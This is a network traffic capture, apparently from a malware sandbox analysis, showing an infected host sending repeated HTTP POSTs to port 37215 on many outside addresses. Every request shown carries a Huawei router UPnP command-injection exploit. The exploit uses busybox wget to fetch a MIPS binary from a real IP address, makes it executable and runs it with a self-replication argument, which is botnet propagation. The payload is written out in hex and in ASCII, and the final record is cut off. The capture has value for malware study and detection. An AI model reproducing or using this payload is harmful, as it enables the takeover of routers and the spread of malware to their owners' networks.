                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1955192.168.2.1351060197.178.75.2537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.554136992 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1956192.168.2.1341512175.103.92.1137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.554184914 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1957192.168.2.1354942197.145.228.11437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.554228067 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1958192.168.2.1336392157.122.174.19637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.554328918 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1959192.168.2.135715841.88.183.10437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.554347038 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1960192.168.2.133731241.181.101.5637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.554357052 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1961192.168.2.1349396157.210.132.20837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.572002888 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1962192.168.2.1344492157.148.194.5437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.572016954 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1963192.168.2.1356316197.213.51.8137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.572030067 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1964192.168.2.1355288197.82.133.22637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.572057009 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 